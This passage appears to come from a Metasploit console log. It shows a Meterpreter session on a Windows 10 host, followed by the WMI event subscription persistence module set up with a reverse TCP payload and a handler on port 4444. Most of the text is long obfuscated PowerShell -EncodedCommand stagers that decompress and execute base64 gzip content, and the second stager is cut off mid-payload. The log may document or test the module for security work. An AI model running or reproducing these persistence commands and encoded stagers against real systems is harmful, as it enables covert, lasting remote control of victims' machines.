18363). +eArchitecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > getuid +Server username: WIN10PROLICENSE\windows +meterpreter > background +[*] Backgrounding session 1... +``` + +Persistence + +``` +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wmi/wmi_event_subscription_process +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > set session 1 +session => 1 +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > exploit +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 1.1.1.1:4444 +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > [*] Powershell command length: 6851 +[-] Compressed size: 14136 +[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit. +[+] Launching stager: +[+] - Bytes remaining: 14136 +[+] EXECUTING: +powershell.exe -EncodedCommand & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ( ( ' H 4 s I A O b k I W k { 1 } A 6 W Z S 3 c a W 7 K E / 0 r P 3 H e t H i B L 8 v U 5 s 0 { 2 } U D y H A B R { 2 ' + ' } Y e v W A 1 y 3 7 I A k f y V J J + v U d X + w { 1 } a X 4 1 Y { 2 } m K v f M R G R m Z / D u 7 f / 7 5 c L i / 2 9 ' + ' 3 / / s + f f 0 5 2 v z + 8 M V s 9 / F y t b 3 f / / N T { 2 } 3 9 m P y X W e P c z v P / 3 r ' + ' 0 3 U Z h 2 g / x q Z q / h X d X q z y Z h X d P B Z l 8 z E 6 ' + ' X 2 N R N R + i 3 Y h R G V + i M 4 h N 2 b y N T h b b 0 ' + ' O t V G f 1 o j q J T x L a K 3 5 F ' + ' 9 5 X ' + ' t / 8 7 + + 1 4 i r i K J q X k Z 3 k J 7 v N O K m b F 7 z n F 6 n 3 H M 8 b 5 0 3 J / 5 e 3 t z z u s G u 7 { 1 } K W e f M 8 r h o x r Z o / o 3 P g / 7 / 4 X i / 4 / h 6 7 G z y / z u M p s r 2 e 4 3 U { 2 } 6 6 r 5 O 7 q R z t f 9 e u 4 X / q x L P t / E r t T / X d v X w G + d + w P 7 + v H / u b f B c 7 + 5 R / d e R t t + v 9 Z + / S Z e N 9 F c 8 / 4 u b 7 5 x n p + / u o i 8 a j 5 H 5 y K 2 t r f H 9 7 b R O i j u z { 2 } 7 / 2 5 + s x z l v n D c s o / F + / l 5 + N e 9 T P m T / 1 S Y m o c / l 9 y R v N u u 8 P G D n j H x 2 H 2 O { 2 } N / + I L O O c 1 2 g f 9 L 5 e r / z c l H s m l e 5 t D e K m U j 7 a Z e y q e I l u g / O G k S 0 i z 4 n f P o q 8 ' + ' + R 1 c z E r l r x 2 R Y 1 d W x H U V D 9 i h 5 3 5 G e 4 / 9 s 2 g r z k E 8 H 2 W 3 7 m s t Y h X N J + I 1 K X V P Z r 9 / Y H d R R R W t I l b O 4 w G / F 7 y / i 3 i u 7 R p G e 4 G d y 7 h 6 5 N z f t R 2 / 8 G f k f { 1 } 1 i W u q 5 T g W + 9 t G y / 1 W 0 i R 9 x z v D 7 g u e G e Z ' + ' y B w 0 X J v W W M y X N r w + c v x E U 4 O O d + 5 W v K / 9 s y z r F / F M 1 v 2 D G O + M z r l P N 1 n u 6 / 5 L l J 6 N 4 r 1 9 f 3 6 B b k V / h e g I 8 X 8 j i ' + ' N c L 3 p / T P s M 9 7 k 9 x J 7 W r 3 Y 5 I q P v j 8 g D r J r { 2 } F x l 1 7 D i + U 0 M S p 0 r O / q V 4 t P J e e 4 M O 4 a 5 8 N k i v 3 w + I N / G l e 7 9 S T z k 5 x n 5 6 V d x z 7 k r P t c 9 c / z w 8 3 H J e X r u B X u N n 2 T n T + J r n L Y c j w P f m 5 X K y / E 8 3 ' + ' S O / c / w f g K N O j / t H 3 K N 8 v f K 9 X Y A b 1 8 W r e { 2 } G 7 V W f K 1 4 X j E M 3 P 1 K H O y S I r Y x j K s 3 A 4 B W e K 7 z j X 5 8 L T K B { 2 } P + a P 4 D k 7 3 Y z e v s u u 6 0 n N 6 X r g 1 b o b w n O 5 R X M 8 ' + ' i U 7 y { 1 } O O 1 l V / L X O B A v 7 M r E R x v y J b u X Z f M O P 1 R n S 1 6 3 4 D q r 8 O 8 H 8 Z f 9 T + R r W I X q U / y S K ' + ' 6 / t P F Z l 4 l P 5 O 6 B e 5 M c c P { 1 } s / j / Y ' + ' P f K U 6 X h B n 2 X N B 3 F { 2 } X l z X ' + ' u Z j w / p 0 6 E V 9 l f g { 1 } P l 3 f / r H t s / J g 7 g o 5 S / n F M 1 / x d 7 / i 9 v 9 v D / x v W 7 T 5 / r / V n o f X { 1 } A v b L j W K 8 7 / J T d I / g w e + T 1 O / x i H u g S X / m j f { 1 } n / K + q 9 { 1 } H 1 f 9 q 3 J v + L V d x w L 4 p U R z 3 k e b 7 X / t 5 x 7 { 2 } / y V l 6 H v z 7 B j { 2 } D y F 9 3 P s M 4 6 F W 9 2 7 t P / R v O L / N X z c c p w u T 3 l u b 1 J d 0 D 9 4 n / o 2 r 5 s H L r B r m 8 t v 5 U f 4 f M M P x X 0 { 2 } r c A e 2 y c + y H w O f H E 6 t 5 f 6 k N 7 f g F t 9 7 8 h / s v v s n T 8 v 5 J 9 w r t c B f N Y p y V s D v h u A G + F o R P z F s z ' + ' v 4 V d ' + ' 9 f E 4 c U / x u + Z x 5 { 2 } v W + w U 7 g Z w i u c Z 9 4 P / F 6 5 3 9 Z 8 I X t X 1 M H A f U a 4 M E 5 7 J / t c Z 5 1 B ' + ' + l z 2 K w 8 F 3 z v e L z 7 9 Z ' + ' r 7 0 P Y f T + w v 6 v v p X { 2 } R 4 6 4 A o + 3 3 { 1 } + 6 2 c N H 3 S N j 1 f s U r 9 / d l 0 b / 8 7 r b / I 7 o z 7 E / / L z B X z o 8 x w + u s F u x V 1 2 t c n T v O S 8 A 3 h + 4 V V 1 P a j 1 x z f 6 w w j + 6 m { 2 } J f 6 2 i 9 q O n 5 + g b e / r D J c / r f O d n l c P j 5 s 9 X + s i c P m S e h j c H 8 H R R 1 9 E Z d q 3 f + e E 1 6 R f Z T R 8 A 5 + p v y v O d + x V 2 Z e a X M 3 { 1 } l + m / { 2 } p x f H f k 3 / N f 7 h 6 a / Y 3 w G v y q 9 5 e k A / U z 4 V t 2 / m b f o X 5 4 T s 1 3 M b 1 0 1 F v q + o a 9 3 / B T 9 m 8 F / q u 8 7 P u J R / r i / w t { 2 } E 3 K / w c G z 8 9 7 L M u m M A D q t s b 9 E 6 y 4 5 v z F w m P 5 v 2 O + + 6 S f M z g m 6 5 4 F f 7 P F q n u 2 / { 1 } U + k A H H t { 1 } r 8 r 4 y D h 6 x 8 w / i t q V v y Y 6 j f f 0 a V 7 s 8 8 a X 9 U D 2 I J z P i s y O e 8 m 8 F v + g + x e ' + ' M c u 2 b w j j 7 v m z c L + u 7 d S U e i g 0 r x { 2 } d I F Z 8 T x h j w J t 6 n P D e g D 3 / B z D j 5 S v z 3 n n i m v 8 m P s / t X g v h V 9 a 1 r r p 7 X 9 r f M o v 3 f W U 3 v q 4 s J 8 U q a 4 q b 8 V 5 O G G v t x 2 v J 9 q v f A A H j f Y q 7 p 1 / n V O w b 2 n P k { 2 } e 4 A X 0 s s 5 X P G b 0 R f I M b h L P 5 e i R q f U 2 e A v r y l G e ' + ' e F B + 1 z z O + w f O d 5 2 N X S 8 l / w + o 2 7 X 1 m P X V A r w K h y / W K 5 F 0 w s 0 7 3 h W X j D 7 f g J c n 1 u / K { 2 } 0 6 + 9 t T 1 Z 8 4 d l L x K n 1 f w g e v h { 2 } F 7 6 5 E v 8 M j d u N + i g B + I 2 N 5 + W 1 N m N + 2 1 9 z t x 6 b U G c h + 5 f 8 J P i O Y m E l z 5 9 U 3 h X f t r U 5 Z y 6 0 D 3 { 1 } j / v F F r 2 J b s q p m w P x t t 4 6 9 S v i K H 2 g ' + ' O I 0 T P u A F 9 B i 8 R J 9 U P o W T { 1 } X Z m 4 A E e 6 I H T O / L j v k R f K ' + ' Z U H + S U / 7 8 m X 8 t 1 z 3 8 p T P 7 5 x 3 8 v h r x y 7 h u 5 X 4 B j / 6 b f { 1 } b / t d n x m H 5 L 3 u h w t 4 U e ' + ' e t 3 ' + ' S / { 2 } j e h F 6 4 9 r 1 x P 5 p 5 / D G 8 r n ' + ' G P t a / l 7 P P F s e 8 5 f q W / E Z c / / { 2 } / b e o d e b X l { 1 } f 6 A f 5 k x s m d + 0 k u H S E 7 1 K 8 v a v 1 q 3 G / A r e p 1 T r 9 u W Z + 8 4 Y / i 7 L ' + ' l j j n 1 d n / d E H s f k g z r F L v p r + Y F H V a e K U z / 1 e + z K o n D 9 F e i A V / K w s Z 8 L e G T q v l o m 3 S l 9 d k / + r { 2 } + 7 4 D X N W a r j N s 8 X J X W { 2 } o W d u y f f a u i 8 T v s V D + n 8 D / 3 d s X 4 P v W 9 9 n W e J z + B o e U p 7 N q / A 5 f S S z 7 u z U O u e J f B T 0 M 7 0 / M f 4 D v D 7 B k 2 v b 1 c O e 1 9 S v a z 5 E B y T d 9 8 I c M 0 P 3 d Z k X T 3 V 8 z b 0 r 8 q N z h 8 w X X e t I 6 9 4 R O r R t 3 r 8 G N 2 v 8 c N 8 F N + a b z H i 2 j s 8 S 7 p g 3 4 G X 1 3 S 1 9 V ' + ' v n r + / 6 D + B U 9 u e f c M X U + g g f U X 3 T / F / h v a F 1 q f H 8 n T g P r 6 H 3 S g S k P T 9 T f h L 6 t c 9 f w Z t d 9 x / E d O k / W F 6 4 z 4 e 8 F + 4 9 9 Y O n 8 F t z 3 s 6 6 ' + ' n H F w t q 5 r / A 1 1 h f f o L n K z y p E 9 W 2 K F 7 i y r l V T r i { 1 } / d v X L f 0 b e o t o 7 + / E R / x S d P 6 g n 7 c x n / 1 T / k ' + ' 5 { 2 } i d n R 5 2 V g + u / i e M M P L W t Y 6 / r u B X W l f D O k a 9 V F 4 r z D + t o 7 y H 2 6 K U z 9 2 H 0 m f l P u N f 3 h Y O / X X f E W 3 W 4 Z I 7 J 4 B P 1 1 7 b n n W / 4 N 4 e ' + ' n q b s q 6 Z H Z { 1 } T e n u v n D c y d 5 t U 7 B f / P q q / U h f m X e T + T 4 N y { 2 } + b e ' + ' u { 2 } W + 5 b E h f h f w a e 0 h x n H h a f v B k v 8 L 3 i v w E v b c 9 R t + R / S v 2 3 D 4 k P O p 6 X r Y M m r v M B + X o m v 0 e e V Z z 7 1 g H W c X t 0 h P v H G J 2 Z m R e / k I 8 V c c u 8 N 7 q t 5 0 T j 1 X Y w N 1 m n D J J e 6 H j O / k x 9 T a y b 0 E f { 1 } q / y 2 / u q w Z 8 A + 6 6 X X e o 6 u T n V 3 f B U e t s x 5 S f 8 Y 7 z v y K D u W 5 a l / P h D H q e f 7 z U k v L 2 s d M 3 N d 1 z q n Y 5 1 8 j l 0 F c y r 4 L h O f K 8 4 H 4 r I A / + o n q z L l Z { 2 } 4 + 2 t 7 n N M l / 3 3 5 u w O N f 4 H G L n k 8 4 z Y n L A n 3 U 8 p z w j f v 7 8 I 7 i N K c + 5 P c S n M L T e c r r B F 4 / 6 i / d n 2 P n l X X e A T u W e e q b R 7 9 W r h v j J 0 / 6 S j j W ' + ' 8 y v 0 n u I 5 p j + J z 4 f g P + 0 T V r y / Z B + i P p e 7 r 5 k f J t b T 9 P E O u E 9 9 { 2 } 3 2 r e b K n V e u m N N e l P D E f { 1 } 0 f u P x 3 r i ' + ' U b d 1 8 b g R H E c c 9 + u 1 h + J z x b s k 6 q P e 4 { 2 } h e k a v u f n b + 5 6 R d Z 7 1 V o / + 8 p k 6 2 M J P 4 u s + v E L e 4 0 N f o i 4 q + a G 6 n U X S u Y X 3 Z o 7 P H D s m 3 u d ' + ' Z r 5 w 5 n p H m g H m t 0 1 Z l 4 s d 1 J N 2 z J u / 0 R f O A z 8 u x b 8 t 8 D 2 6 I h + 7 b M P / S P 6 z b A r s a 5 O P G e 1 H 2 F H r t O J 9 N 9 + 9 a V 8 1 d B 9 Y d x 7 6 3 t z 7 1 H F K i a z 9 T 9 2 P 6 h / d W 8 L L n M O ' + ' / z p v A j e b V u { 1 } u K 3 w ' + ' B / v K d i P R d r D D M G p 4 u P P 2 Y 9 S R 2 3 v 1 8 7 B / d x z S B { 1 } n E e / 3 6 Z f 0 f e q w 5 T g N 7 { 1 } d x a H k u O b c u 9 / + D D 3 h M 9 b T F T u L r + T b H n w P P T T 1 3 l v x / S z 6 m n m O q 5 J f O L 9 j j 6 d X 4 b X v v V M G / h f t j j c O k F + t 4 g S f z X b / e 4 1 x b d 7 P H + j { 1 } 3 L N g X p P 2 u d d i i S v u u N X P { 1 } 1 W P q o x 3 r 5 { 1 } f 0 o u x + T s + H 9 0 c r 9 g f o P f D Y K d P e V X h c 0 / / V t 5 b s A 4 4 8 p X P V D 0 b 4 P 7 A + y O g j F / z f r 9 L + U + f d 4 O e E v V q r l 3 D b 7 i U 9 3 H X f v D f e 3 V f Y b 6 I H o t ' + ' 7 z 5 e { 1 } 4 s N 3 G q e e s S 3 S ' + ' U 7 J / B + 2 l f U v D c L M 0 P c V G / W s f 3 f c 9 x v 1 G { 1 } x 8 / 1 3 n { 1 } O H Z M y 7 a U K 8 s n n e d o D D S P p q W 2 Z d M G k / I B b x W l I P 4 f X g v 5 h / W e + 2 t R 7 t 2 O f W Y M H 8 ' + ' e { 2 } m k r 6 Z e { 2 } 5 1 f X 2 x 7 i N / L e + 1 9 6 m v E f c G e D 7 + f n D F 9 5 Y + v 5 f 2 i t 0 s z b 1 p j s v q e S O 3 H k P f t j 2 3 n { 1 } W 7 0 7 0 r 9 g Z p X 9 d j j p p W q a 8 u 6 7 k w p 5 + w l / { 1 } 8 U r D / 8 j y 4 Y 3 6 { 2 } f a q H X + Y r + o V w P 6 W u s v e 5 Y 2 B c e X + c 2 T / v F b w n v / M e p E p z 7 9 w 4 q p h r P t c 6 4 L t 1 v / k 9 g y 8 X 9 I 2 l 5 9 E D / N O 0 T i v T f n J H n c i f E X Y m 3 W d 9 e V O l + d F 7 J f a H 5 g f m A / U r f T 5 i z 9 3 a p 3 1 ' + ' g 1 3 v 9 Z + t B 5 r d T 3 y 3 h h a X n a f Z v n t + Y W 8 0 L f e O q S v u v O f Y p D 5 M 8 6 Y a c P t x Z p H 1 e l i c 9 k X T V L b w z 4 N 6 U R / N o z t w h X I + 9 P 7 E + q r h / { 1 } y / I 7 q H n + o ' + ' q 6 O q v 1 z w W f 5 / ' + ' S Z l v F z z 7 k T x 2 H ' + ' D v f u 6 L 1 z V + R 5 x z s J 5 / F r r l A w + G Z l n ' + ' 0 V n U u f t a i Z 4 8 4 J f 7 n u K / c / 3 A b / T P f d L J L c 9 z H + Y W 8 8 v F e 9 9 0 v f Z r O 6 4 9 V 1 B / 1 M v 7 / v Y n v H W s j z F 7 U O V j 6 T m w k f Y j 7 O 1 L 6 j n q O U D 4 c f 0 z p z O v D d j r v Y G r g r 0 d + K / ' + ' 5 Y c b n 4 t O F 6 6 E A L 3 3 b j a 5 r + f e M S 3 i s e N 9 D X N b z 7 Y j 7 V p H m h K F 1 q O c 9 9 5 s Z + j H t ' + ' g Y b 0 s x v 2 f E n P n N X 7 Y N f 5 0 n z n 3 8 M e / b v L u 1 5 7 N n 6 9 3 / h K P / l ' + ' i / q 0 S z 3 7 Y O 4 2 w c 1 c m e w f M 2 e a 5 8 P 5 x 6 d + r v m L / c 9 0 P H v B v y v n q / + t 6 D + n 5 u + V 6 M j 8 t P T + Y D + e u f + s X x + O Y F + 8 h p 2 X a S 6 k u / v b v h t 6 r F h 9 0 Z + K r p M M W y X / Z M 3 M f 8 n O / v H 9 g P m F / V v f L D f v o z P u R a Z p j s d P 7 s R n x G 5 r / s t P z u + M c 7 D 2 3 f 7 + 8 I s + r P M 0 v c / 9 u a Z 3 X s N 6 J t P / 1 n k d 5 W b v e X f + H t J d J O n n z P q d 8 s d 4 F ' + ' v 2 3 z + d v 7 n i s D b 9 6 v + 3 e h F P c 7 x 7 N M v 0 / O 0 f E t 6 / 9 r 6 n 5 H X ' + ' X a L N N / y O 3 O e 5 u I t / ' + ' N c u 0 u 9 p r d 5 p n j j 6 O f W + 2 H x 9 j O 9 F / X v F h f m 1 f m 7 E P N F d p P 1 S + j 1 p 7 7 k { 1 } v / h d i r n N 9 a i 8 M 5 f V + v / D P d Y x g 1 q f b P L T f b e 1 / ' + ' r 4 D T 5 / + 9 Y 9 P x e P u 4 d P / / B c u y R p Y g R ' + ' 8 A A A { 0 } { 0 } ' + ' ' ) - f ' = ' , ' C ' , ' Q ' ) ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) )  -InputFormat None +[+] - Bytes remaining: 6136 +[+] EXECUTING: +powershell.exe -EncodedCommand & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ( ( ' H 4 s I { 1 } O b k I W k C { 1 } 4 W Y S X P b S B K F / 8 r c P B P R B 2 p z a z q i D w k R X C y R d H F T k x N z 4 D a w T S 1 u y R Y k / ' + ' f p 5 3 y t Q 6 j k N L w { 2 } Q Q F U u L 1 + + r H + V d 0 9 f H + 7 v b n d 3 P / 7 9 2 2 + T 3 Y + / / D F f P X x d r W 9 2 f / / Q 0 u / 4 y + R T K h + u 7 z 7 8 8 m F e F y / R X s S { 2 } j p e 4 e I x h V X y P 9 i C G d d G N d h X z K k 6 i M 4 { 2 } Z 1 7 K O q 1 r P y 4 r ' + ' 3 L r m / r I t O d B d 6 P 5 6 i 3 M c m i o / R 0 f M o f k b n P q Z J / 7 c j t h G v U Z Z 6 X / t 0 Z 6 x z F b 1 F j ' + ' K N 4 j H I W q 6 p o s e 6 6 K p 5 4 v k z F M X Z t W e f i n P V m 0 e v H O h W l r 3 V x G 9 0 U ' + ' s 9 B 7 s l v r f G Z 9 3 Z 9 E 9 z R G q X j { 2 } / y 3 v y Y 7 r K H 5 w r / 8 7 U Z 6 y / t f o 3 c e m i j r a Z c y j W G D 3 C D v x J x U p u l q 3 K k 6 j 4 / u P 0 e 3 H p z q 0 7 k b x K l 7 f / O 7 N Q n H 8 { 2 } t 2 H 5 9 d 8 r / W 1 j + J y H s s o x t F O + F 2 y j q 7 P x G U V s q O 9 1 / M 4 y 3 G I o 2 j 3 Y 5 I U f 6 0 v e ' + ' w f E a Z v w X / E J r a / 9 d h G O l + x o 8 Z 6 + P y F v m 6 q Y R C f x / D m 6 F f 8 f R W 9 { 1 } v u 6 i t 5 c f r D + I u f 3 Z x I 6 8 d k v i q X j L r 4 h T 4 r e x X 3 3 y M o x u C z x c E p 9 F p X w o 7 p s E H s p Y V s W c d R d 1 z p / 2 S d E J 5 b 3 4 k 3 3 0 f M x 6 u y r j Y l { 1 } p H 4 r D s p J 9 v Z J 8 f 8 z 7 y H / F e 8 3 3 3 Z p 8 7 q P T x z / n X 3 Z c R 2 ' + ' 8 T U / x X P r T u ' + ' C e u N i R s 4 x X / 8 q / H X d m m / E v 9 f y L f ' + ' w 8 0 z c ' + ' d y F 7 9 d 2 y V r 6 7 + 5 j W x a / k / z 9 J d a D v R t i t e G 5 q 4 a U X k c i j 8 i R / n 4 n / q s G l / H { 2 } F / 8 L b C / b N q + I P v s / r 9 V m v h V 2 r O u 7 { 1 } 3 a c 6 x 8 N 4 E x 4 P O D F + y x Q D 8 l w u l B f q 6 J T 1 z 2 w / + C t b M Q Y P i u 8 O H M i + L X E U v i b G 7 5 5 8 C ' + ' 4 / 3 k b B L 9 { 2 } n v f / r 9 S n U m + y c 1 e a 3 { 1 } 0 X f y u a S e l H f h L 4 E P + X X D 8 5 3 3 V d 5 S y K 5 H / j / i f p S I 8 4 B 6 v y U O y p / z I F x 8 b O o w 1 6 X z p 3 z x X t n P 9 h H v S v H s e P 8 h + Z 8 Y x w v ' + ' Z R b z P i c s p c Z p U 8 F E i r 8 a p 4 v C F e O 6 I f 3 c Q 1 9 5 3 k O u { 2 } v I c P C v K k e n o i T s p / i 3 { 2 } M Q v F s { 2 } 3 f q d { 1 } Z u T s G 7 n p + R 9 w l 8 I J w m 6 i X z z o 2 / 4 7 n s l J 8 P 1 I P i / R y d D b x w R L w v 3 / M 5 B d f y 3 / w x J I / K d 2 I / X a f U d R e c E 9 d E P T + y 3 s Z 1 6 X ' + ' 2 c r x n 1 K F y v K 9 1 r / + T 8 t 3 J 9 y S / 5 b 9 4 7 4 E X 4 P O ' + ' C r D w 7 0 f { 2 } v / d t Q B e Y L H 9 N 2 1 + a Q G N w P 2 X Y N b v T e u V { 1 } / a Z 2 R e h i f { 2 } x w R P 7 f F j U O l / x 0 X 7 t V m H u i F u 8 O k 5 e f 4 W v U R c n 4 j D E v 7 u u U 5 v 2 F d x + 9 r U 7 w n 5 H X q / G f G t y Z 9 4 Z { 2 } 8 + p 8 R J e L 8 k X 4 r r l H 7 T q 5 p 1 F v D 2 h L { 2 } p r n 1 w e v B f 9 V w 3 d T r G H u 8 n O 1 b U v + I 2 I h 6 y X 9 9 d O D 9 V c c / 6 w y r z 9 4 { 1 } 8 y c 4 h 6 4 G L F O 4 T G / N P Y v / v X F f { 2 } U f h S P 5 s a B 5 X s U N z k / 7 X r k / z I H + F 1 3 / j / z H U I X s T P y s M p 6 4 ' + ' y p U + V p W q u e Z N e M f q v 8 ' + ' r 1 0 3 8 C Z 1 c I + 9 n 8 C d + s ' + ' Y Z + 2 y I l + 4 T P K f v 1 + B U / 4 / x 8 8 L 1 N S M v s u c 7 O B r W G T 8 L + E J + D Y y r B c / N h x P 3 s Q C P ' + ' w v M M X C W e z / F L 7 8 / o ' + ' n 7 x P / o U v 8 c s R 8 Z ' + ' r { 1 } { 1 } 8 J n o i + p 3 q + c v 5 T 7 S t d 6 4 { 1 } / j s H q r i + / w 1 p a 8 i 1 d U 7 6 v 8 v v I q u 6 / e + f G Y e K l O a v Z X n 7 8 j X + L 5 P 5 u 6 v / P / N X 0 t 6 M 9 7 r m v 6 j / C 0 p J 4 7 1 { 2 } d j 5 5 M + I 7 x v W F c 4 c Z 3 2 Z p m f t c 8 M 3 G T d c e D 7 O X 1 Z 9 X r f 6 J U F / i h O x / C W 4 ' + ' v i { 1 } P Q P z E / W r u h U O h r b b + P 0 E b 6 y M I / O 6 8 S 6 e e I I 3 F / B p C U + j e 8 { 1 } T d m / { 2 } 2 w 7 7 X d ' + ' H X d B ' + ' X / X R u v ' + ' 4 F D 9 d { 1 } P f y r 4 d 7 y t + u 5 q + 0 6 I + 7 p r 4 d c C L 7 D r F X + V z Q D 0 J Z y X x W I F L 3 Y s P j o m j 8 r { 2 } { 2 } L z t 0 F + ' + ' u { 2 } p 4 S b K 3 h L u D B u w J d 5 M x H H { 1 } 6 7 c 5 1 R n F / S F z D u O 2 y f w c ' + ' 2 X + u 8 f f Q 1 x a T V 8 / 4 G B J P R 7 2 X c I b W t e 8 L l y t X G c L + v C x 9 Y b z W e F n i 3 X F W z / x c 4 F O y L r z K / Z I Z x x Z p z l v 9 1 w X 4 F P 9 / 7 D v M f h S H Z 1 m H Z j 1 z c z 6 0 3 3 6 1 L w b u U 6 G 1 F n b / r y Q r y u v 3 6 d O r 6 1 L y F P X + / 4 k r 3 P 0 b e 6 L l + R b v H m d 9 8 3 8 N I Z H e u 4 v 5 t 1 t k l / k o 8 p 8 L X / M T 8 r z N ' + ' / f 9 O t e V 8 U n / o 0 + r f q b U Y c 8 6 p { 1 } v f j t h H 9 i + s 1 / r E q e Z + { 2 } F + K h / V c m 3 r O c b S e U P x c x 4 r f F P s U r w l 8 3 a Z f o O N r 8 D B y H N D L u u b + T n 9 Q f t / 0 S I K v X s H 5 C P y U 6 G T 6 r u 1 6 a X j / j v W N J / w n j r 1 H 6 v i f 4 G Y E 7 p W P 5 X u e D n j 6 { 1 } b 4 W 8 E X G 8 x f z b J X j t 3 N f q v B j h t 3 K 1 w X 7 X D I / H O q 8 E 3 l u k H 4 e { 2 } O N O a u Y B 9 a v m X r x / x b 4 L 9 7 X / 4 a v P f 8 3 f o s 5 8 s U Y H 9 O D R 4 q z R L z / B x d x 9 w u / t 6 Q 9 b z w m z P P d k / T I j T p k v H a e X X E f k E z v { 2 } C / S G / J U f X l 9 1 v Q O v X C v q x P i d s t 6 0 k n 3 W 6 e o D B 3 + V D 6 1 r 3 l q h Z / W d 5 7 c c v w f 2 W V o v m i / u 4 L V t w 6 u e h 9 D Z C X 1 W S 0 9 l 3 H j O U L 1 u j V / 0 a O R 5 w P X r v J 5 4 T u G 5 6 n x t X V z ' + ' C i z X r a 9 + R e Q z 9 d u G 8 X 5 K 3 Z W S e X 5 t f w S P 6 o k J P 3 O b n x C W I o / l ' + ' 3 l H K f n N S 5 r 6 7 R j / J v 7 L q 7 J 4 9 f q f e Z c T l D J z 0 Q j 2 v 6 i N 7 b N v W l / T v W B e a l / R u P K i 4 n P M 9 5 b u Y R x W O I ' + ' f s x 1 c c N 3 V 5 6 H n Z c F u i o 1 / i b X b S v P O a 4 X 4 R 0 d l N { 1 } r p 7 n v 5 j m s N t 9 X 4 k v 5 Z T 3 a t c 5 x f 0 m 2 G 1 y D R / V t e M J z G 3 j r o 3 O P c 1 7 p p 5 5 3 z P t X 6 C O t P 8 N O 5 { 2 } v w U b o O 7 + { 1 } L 6 5 D O I O t c r b t y X 2 I O 1 3 u 6 n 8 M X 1 G V S X e r / l f s E 8 2 2 e 0 y f p ' + ' b b 4 8 8 / z t u T Y R n 5 / G V U i / 0 / / Q Q f Q h 6 1 b 0 s e q r 6 3 h e E x f Z d a j v e / K 4 Y a 4 Q L y + Z k z q e I 6 x b l u m t r p 7 h 6 T H 5 7 z I n N / v D s 3 p P / P O t q d 9 X d N M V 8 y j 4 x F 7 t s 4 4 c F / O X / B { 2 } 3 5 x B ' + ' / 6 U c T n q + Z a 1 W f 6 { 2 } P G 0 c T r V T m + X d f T L f U 2 J 8 / K x 2 W d 5 7 x D H ' + ' 9 t Y ' + ' F z F 3 Z l 2 X + 8 Z 5 1 i H Y a Z 2 1 o d 5 K 8 L C G t 3 N / s d 4 d o Y u 1 7 h a d 0 f Z ' + ' 5 x b u e 9 3 k J O s H 4 + c Z 1 x / 2 h 7 q k z 8 N H z / N f K e i 7 3 + Q H 6 E H 1 O v 9 B 1 { 1 } w 4 7 7 ' + ' 7 p 5 Y x 1 0 D 7 5 S 1 q V 6 X r p v d F l n 5 / { 2 } z 1 3 L 1 + U j L 8 U L f o l v R 0 5 x j w C / C n f r F i K v n P d X h z v 3 m X a + s m / O J M f p d / U B 4 + W J d 0 8 R x h t 6 D X w N 9 u M k 6 q + N 1 7 r h e o i v R R 4 7 z j H m m f u u f 6 G z 4 H 9 0 B v t G D 8 E 7 P f d b 1 M q J e D 3 F T P J L 7 Y o C T H 8 y / a + K f 5 5 { 2 } a / h l 5 z h h ' + ' Q h + 9 9 q 7 R O + + G 4 w { 1 } + 9 R c 4 j 5 z P w B n O / z ' + ' 7 n 2 5 O 0 G O x f s 2 0 l 5 D r u w D h z l ' + ' O l E 8 F Y e l 5 9 / q L S 9 D 4 2 O B / t z z 3 r z ' + ' O / W 5 Z Z V 2 2 R S + V P o d 5 y X 0 c v Z 3 { 1 ' + ' } a c t 8 R 3 9 T v s w r W U 9 9 y f l k P j s n T p 5 r t p w 7 c W 7 B / N B p 5 t U e c 6 h 4 Q f a P m N 8 5 T 3 r H 4 y 3 6 U D z 7 + h b H N n o n 8 4 N 1 S j 7 f M f 5 W 9 G n O T d C D P c 8 7 R + T H 5 4 P Z H 5 + / u P 5 K n w e 9 { 2 } { 1 } f p q 0 f 3 T 8 9 n n K e E d e 2 m y u c n 1 q l t z 1 N P 8 L / y 6 v M { 1 } 2 d 0 3 3 s F f 2 / r a 5 2 0 j 5 h 3 m M p 9 3 2 J 5 j n 2 / 5 n G k { 1 } j o 7 4 b { 2 } R f 5 P P L p y a u N X F b 0 c e E 8 6 l 1 W 0 V e F / { 2 } 3 s c 4 0 v 7 j O 3 D e t Q / Q e e D Q O N 1 k / c k 6 V M j 6 y v n 5 s z r c W m b d L 8 + n n f K 4 V n q s X 9 H / 4 m H O W P I 9 6 b l C f m r t v R j 4 X m O B 3 2 f B j x / P N G e c n o 5 T P k d b w i + K T q q x H V H 8 P 2 D 1 v z h s 9 z 7 c d B 8 / B + b y j m W / ' + ' f 8 r z P c y B 9 N G X / r F O Z j z x n z v I 5 Q e n 4 v x C n n X V k n 7 h e N / 0 1 9 2 P O 2 Y S H { 1 } 9 7 X + J H j / / K u D y P z i e f k w v r 1 8 P 4 q m r m V u S i f h / r 8 c I y e E e 4 v r c M e w a H 1 a e I 8 q D T P 1 P C M 1 v k e F 6 3 c B 9 q + f 2 T d Z F 6 o 6 Q s 9 + 5 1 4 b 8 / 1 M T q P 8 O i Z 5 1 f y J b 6 4 o o + j p 6 q i T b z X 